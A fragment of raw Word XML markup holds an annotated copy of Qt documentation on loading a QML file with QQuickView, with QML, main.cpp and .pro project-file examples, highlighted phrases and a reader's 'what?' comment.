          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application.qml</w:t>
      </w:r>
      <w:r w:rsidR="007C0C2B" w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, it will look like this:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.3</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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height</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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color</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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lastRenderedPageBreak/>
        <w:t>It can be loaded in a Qt application's</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main.cpp</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>like this</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#include</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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</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w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</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argv</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QGuiApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</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argc</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argv</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QQuickView</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view</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view</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setSource</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QUrl</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fromLocalFile</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"application.qml"</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view</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show</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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This creates a</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId375" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QWindow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-based view that displays the contents of</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application.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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The application's</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.pro</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId376" w:history="1">
        <w:r w:rsidRPr="007C0C2B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>project file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must specify the</w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module for the</w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QT</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>variable. For example:</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TEMPLATE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app</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="002863E6" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QT </w:t>
      </w:r>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> quick</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="007C0C2B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SOURCES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main</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cpp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0C2B" w:rsidRPr="007C0C2B" w:rsidRDefault="007C0C2B" w:rsidP="002863E6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="creating-a-qqmlengine-directly"/>
      <w:bookmarkStart w:id="479" w:name="_Toc483000633"/>
      <w:bookmarkStart w:id="480" w:name="_Toc483003650"/>
      <w:bookmarkStart w:id="481" w:name="_Toc483603986"/>
      <w:bookmarkStart w:id="482" w:name="_Toc483605206"/>
      <w:bookmarkEnd w:id="478"/>
      <w:r w:rsidRPr="002863E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating a QQmlEngine directly</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
      <w:bookmarkEnd w:id="480"/>
      <w:bookmarkEnd w:id="481"/>
      <w:bookmarkEnd w:id="482"/>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If</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application.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">does </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not have any graphical components</w:t>
      </w:r>
      <w:r w:rsidRPr="007C0C2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or if </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is preferred to avoid</w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId377" w:history="1">
        <w:r w:rsidRPr="00690F6E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for other reasons</w:t>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00690F6E" w:rsidRPr="00690F6E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>what?</w:t>
      </w:r>
      <w:r w:rsidR="00690F6E">
        <w:rPr>
